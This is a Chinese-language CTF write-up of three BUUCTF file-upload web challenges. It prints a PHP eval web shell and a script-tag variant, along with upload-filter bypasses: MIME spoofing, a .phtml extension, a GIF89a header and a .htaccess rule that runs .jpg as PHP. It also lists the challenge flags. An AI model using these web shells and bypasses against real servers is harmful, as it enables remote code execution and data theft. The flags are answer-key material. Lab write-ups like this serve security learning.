BUUCTF - Web - upload三联
文章目錄
- [極客大挑戰 2019]Upload
- [ACTF2020 新生賽]Upload
- [MRCTF2020]你傳你🐎呢
[極客大挑戰 2019]Upload
一個文件上傳的題,先看一眼發現沒有前端檢測,那就是后端腳本,先隨便傳個圖片馬
操,上傳成功了。。。
里面寫的是:
這是隨便傳的以前的圖片,以下是正常順序:
先寫個一句話木馬傳上去:<?php eval($_REQUEST[8])?>,抓包將類型改為:image/jpeg
看來不光檢查了文件的類型,測試發現php[3-5]也不可用(phtml不被過濾),可能是黑名單繞過
嘗試傳.gif文件,抓包改為.phtml,一句話木馬:<?php eval($_REQUEST[8])?>
看來后端 ban 掉了 <? ,那就寫:<script language="php">eval($_REQUEST[8])</script>
猜測后端存在getimagesize()函數檢查文件頭,在該文件前面寫上:GIF89a
訪問一下傳上去的圖片馬
路徑不對,猜測路徑為/upload/123.phtml
上傳成功,蟻劍連上在根目錄找到flag:flag{baa96266-a311-4b3b-b13f-8605521b6802}
[ACTF2020 新生賽]Upload
看到源碼里有句前端檢測白名單:var allow_ext = ".jpg|.png|.gif";
上傳剛才那張:
拿到shell
正常思路來一遍
寫個一句話圖片木馬抓包改后綴:<?php eval($_REQUEST[8])?>
改成php、php[3-5]均沒反應,phtml回顯上傳成功
flag:flag{8ea3be0a-0b5a-4f5b-8252-1a15502f68cd}
[MRCTF2020]你傳你🐎呢
先看源碼發現沒有前端檢測,傳一下剛才那張:
好吧按正常思路來,寫個一句話木馬改后綴:<?php eval($_REQUEST[8])?>
.jpg文件上傳成功,但改成.php不行,嘗試兼容文件后綴也不行
看報錯信息是說臨時創建了目錄來保存該12.jpg,既然不能修改后綴,那就傳.htaccess
AddType application/x-httpd-php .jpg
猜測flag在根目錄下,直接讀:var_dump(file_get_contents('/flag'));
總結
以上是生活随笔為你收集整理的BUUCTF - Web - upload三联的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 在迅捷CAD编辑器中怎么将CAD图纸批量
- 下一篇: android n 小米功能,小米的an